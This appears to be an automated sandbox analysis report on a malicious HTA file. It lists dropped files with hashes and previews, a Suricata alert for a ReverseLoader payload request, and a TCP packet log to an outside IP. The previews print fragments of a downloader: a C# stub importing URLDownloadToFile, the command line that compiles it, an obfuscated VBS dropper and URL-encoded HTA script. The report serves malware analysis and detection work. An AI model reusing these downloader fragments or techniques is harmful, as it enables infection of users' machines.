                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):0.773832331134527
                                      Encrypted:false
                                      SSDEEP:3:Nlllulc//l:NllUc1
                                      MD5:AFBCCCFCAEDE4EAC16C02ED29987AEFD
                                      SHA1:CBA6B134DD481344494FBB46BC51BCC929E942A4
                                      SHA-256:C03647074BF12CF00607B7816EAE067E9B81287AE61517FDE83FE825BD042375
                                      SHA-512:8D8714F35D143CCBB920B51AB00BCCB7546D6A39FC128F07738461A482062E6F5776EC98A9AD7EC537F885E599059876E597FFB978975E8BBE5F8BABB4175374
                                      Malicious:false
                                      Preview:@...e...................................k.......................

                                      C:\Users\user\AppData\Local\Temp\RES35E6.tmp

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 25 10:14:09 2024, 1st section name ".debug$S"
                                      Category:dropped
                                      Size (bytes):1328
                                      Entropy (8bit):3.9751790931456217
                                      Encrypted:false
                                      SSDEEP:24:HCe9EuZf17H9XDfHWwKEbsmfII+ycuZhNgsakS7hPNnqSqd:fB17dzVKPmg1ulgsa37TqSK
                                      MD5:D415B0AABF6CEF45C5C66C75EB7362E1
                                      SHA1:D961D2B89E9151AB6C5415445244915B940B0BF4
                                      SHA-256:BB7169C43DD7FD079BDC8A262C2FD533F08CE2272A2077C6D4EC9FEB69BE7D2C
                                      SHA-512:841DC3ACA5764D8E7EB04988D7AB132A44F0785577B04DF49B1D499EC131452DA0CD621E3C02C155CE95FAF680A86FAB29E347DF7D2F865286AE5BB1EF675012
                                      Malicious:false
                                      Preview:L...qo.g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\wasjhvt4\CSCDECCDD78A6DD41E39CFBA2A99F0F744.TMP.................=..c..kP2..Md............4.......C:\Users\user\AppData\Local\Temp\RES35E6.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.a.s.j.h.v.t.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54b0muzo.vqk.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5glnbubu.znt.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5zq4nnja.1hl.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2ex415s.ozj.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fmkjxatq.stc.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fzypzuob.2t3.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_plh2zfhq.dsq.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qi24ypfz.dy2.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1ctk0mf.xnh.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wexouexv.ms0.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\wasjhvt4\CSCDECCDD78A6DD41E39CFBA2A99F0F744.TMP

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                      File Type:MSVC .res
                                      Category:dropped
                                      Size (bytes):652
                                      Entropy (8bit):3.108091532099102
                                      Encrypted:false
                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryusak7Ynqq7hPN5Dlq5J:+RI+ycuZhNgsakS7hPNnqX
                                      MD5:A63DE7FD638F986B503293E64D64BEB6
                                      SHA1:E6E6868D48C9019DCED864AFE6FAB80DC19ED6FA
                                      SHA-256:13030D74D11D28F56D83E84CA54D6D4F100FB5D5FC6B200108BB2D43A3586283
                                      SHA-512:C5444E58F42FE3478D0D411F8D85A3ECEEFD687D68181FF19351286043D48D01BDF9E84C1004FAB0A8B6307450C04F2B38C9F0A360549BC947BDAA1B0407DADE
                                      Malicious:false
                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.a.s.j.h.v.t.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...w.a.s.j.h.v.t.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                      C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.0.cs

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (351)
                                      Category:dropped
                                      Size (bytes):469
                                      Entropy (8bit):3.7537928868168384
                                      Encrypted:false
                                      SSDEEP:6:V/DsYLDS81zuly0NIMmFB7QXReKJ8SRHy4H6xr8MCLJWxWJWKy:V/DTLDfuldcWXfH1MeGOWKy
                                      MD5:DE4A3E7070E220B427D460A803BF2B1B
                                      SHA1:F59C55466008CA3D557CC114C01395BA724A3A32
                                      SHA-256:0652DA0455490EAF890DDCBC122A763D5F4031A9B2825D514D105BD8EA142EAE
                                      SHA-512:AFED9FF23E8F788D80F409856741BC68E985EB0092412F91E709D917FC37EA47E43B2560313195E5C0F8FACC6232DDD74E5CA38C66D16AF31D5F7B4984999B85
                                      Malicious:false
                                      Preview:.using System;.using System.Runtime.InteropServices;..namespace rpwYIiFsex.{. public class niee. {. [DllImport("Urlmon.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr RhPAWaU,string ZHOGcU,string Qo,uint lshbPHts,IntPtr j);.. }..}.

                                      C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                      Category:dropped
                                      Size (bytes):369
                                      Entropy (8bit):5.254466404265157
                                      Encrypted:false
                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fZgzxs7+AEszIwkn23fZSAn:p37Lvkmb6KRfBgWZEifBSA
                                      MD5:25D6F96CEA2D9B1D21B973E2F891FA17
                                      SHA1:2BEE344FA01EEB72088C8A413E758EF6A663801A
                                      SHA-256:8F13ADEE05C4539887F6AFDD280C024EE7B1FD23AFDDCAFC9A653D76826E4FC5
                                      SHA-512:C40B26C04D56C52CC6D36C51B10584AEC1F0708834F10322A9A731BBC89435DBE58D58394002E5F57574591C475C09309AE87A1401373D5374E9603861DD8714
                                      Malicious:true
                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.0.cs"

                                      C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.dll

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):3072
                                      Entropy (8bit):2.8048353073203716
                                      Encrypted:false
                                      SSDEEP:24:etGS4PBG5eM7p8mqBk+lTfz3tkZfFBqhkWI+ycuZhNgsakS7hPNnq:6HsM+mArKJFBEH1ulgsa37Tq
                                      MD5:ABD829FEEDF4B3B7901EAD53591F15A4
                                      SHA1:CDCDC059ED839A52F574F6DAF547EAD4A4BF2F60
                                      SHA-256:C1E8B2B5D46B9BF5DDDDE51DCFC0BE0411A460622F07DE4CD2DCA9104E59AE73
                                      SHA-512:FEB5E890E67677F9D4466FA0FABE8203BA5529E5C3320A938BD5327696DF9240A8411D200EC4B0377A66D9C7443E64A8002FC242ACF45FEE787EA006D3E034C5
                                      Malicious:false
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...qo.g...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................7.0.....s.....s.......................................... >.....P ......P.........V.....^.....e.....h.....q...P.....P...!.P.....P.......!.....*.......>.......................................'..........<Module>.wa

                                      C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.out

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                      Category:modified
                                      Size (bytes):867
                                      Entropy (8bit):5.307741718510356
                                      Encrypted:false
                                      SSDEEP:24:KJBqd3ka6KRfXEifaKax5DqBVKVrdFAMBJTH:Cika6CXEuaK2DcVKdBJj
                                      MD5:2B543CCD4DED4FE31B65870D07219AC5
                                      SHA1:7B80C69C5C1C6291B76B3C99777DBF0789D57601
                                      SHA-256:B447F5B72E9C0126CCD37B79B066824FCFA2E34F33D003A4745FBBAFD0D90CED
                                      SHA-512:AE9A9197441236CE3779F2097FCA6B45081FF77513FA22D2D50E27192706229F84E90703775BBC4120722740375B10C20B91F4B6D6FEF3FA4977E0F5B8C133E9
                                      Malicious:false
                                      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                      C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):139890
                                      Entropy (8bit):3.6923510936476616
                                      Encrypted:false
                                      SSDEEP:3072:vybNgt5pdGwoO4TxQQYQt2Cwvo6buGauOmM:0DNlYTdvo6TauOx
                                      MD5:52A69AB69D1C871566791A3C06982607
                                      SHA1:367845C8B76D602680EE6069F3BDE95E02C350D9
                                      SHA-256:4F6090A3D6A848AE3EF2310CACA02976FE8448FC21CBE357F4A28A88F34EAD28
                                      SHA-512:681B60151EF27726F8B4C9C0949A8962FA8B16FE3583BA5EE4019831B6AC2AD5BF2562DA0E8FC55CDEC4CB10C59A608896B9BE98BEDD1A8BBDE43B711EE2E0C2
                                      Malicious:true
                                      Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .e.s.t.a.m.b.r.e.i.r.o.)..... . . . .d.i.m. .a.p.o.u.c.a.d.o.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .a.p.o.u.c.a.d.o..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .a.p.o.u.c.a.d.o.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . .

                                      Static File Info

                                      General

                                      File type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                      Entropy (8bit):2.5269830459558813
                                      TrID:
                                      • HTML Application (8008/1) 100.00%
                                      File name:seethebestthingstobegoodwithhislifebestthigns.hta
                                      File size:133'636 bytes
                                      MD5:0b1aa8ae190d05df71f4052fae67df5b
                                      SHA1:f6fe29f3e7830b15e3b244ba83216c029dcb60fb
                                      SHA256:4e15eab180712f99efe5eea760beea458c7bfc4eeb5f5961b2b5d0c9b7611d3d
                                      SHA512:94008a8bf00a1334c16129258243bf89d8351c82ede845fefdb657838fe2f602f761b9935e5fef5e01b368096993f49a48e65d3705cea948d9435db0df370a04
                                      SSDEEP:96:Eam7QSo4DH5wo4DH5rtTRJP4srvjTKP4DH5Sr4DH5NFAb5UAf4DH5G7T:Ea2Rok0RLknYoVT
                                      TLSH:F7D3A089EA3188ECB7DC0EA7BDFE739D3959575FA3561E91930B3641CC6434D508042E
                                      File Content Preview:<script>.. ..document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%25252

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-10-25T10:33:19.622000+02002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.449730192.3.176.14180TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 25, 2024 10:33:18.957508087 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:18.963543892 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:18.965061903 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:18.965061903 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:18.970927000 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.621716976 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.621767998 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.621804953 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.621838093 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.621871948 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.621907949 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.621942997 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.621977091 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.621999979 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.622000933 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.622000933 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.622000933 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.622000933 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.622011900 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.622000933 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.622000933 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.622050047 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.622111082 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.622111082 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.622111082 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.628006935 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.628060102 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.628098011 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.628103018 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.628170967 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.628170967 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.737072945 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.737128019 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.737164021 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.737235069 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.737323999 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.737320900 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.737320900 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.737322092 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.737322092 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.737386942 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.737410069 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.737422943 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.737441063 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.737461090 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.737482071 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.737517118 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.737803936 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.737838984 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.737874985 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.737909079 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.738034964 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.738034964 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.738034964 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.738975048 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.739067078 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.739104986 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.739098072 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.739144087 CEST8049730192.3.176.141192.168.2.4
                                      Oct 25, 2024 10:33:19.739166021 CEST4973080192.168.2.4192.3.176.141
                                      Oct 25, 2024 10:33:19.739166021 CEST4973080192.168.2.4192.3.176.141
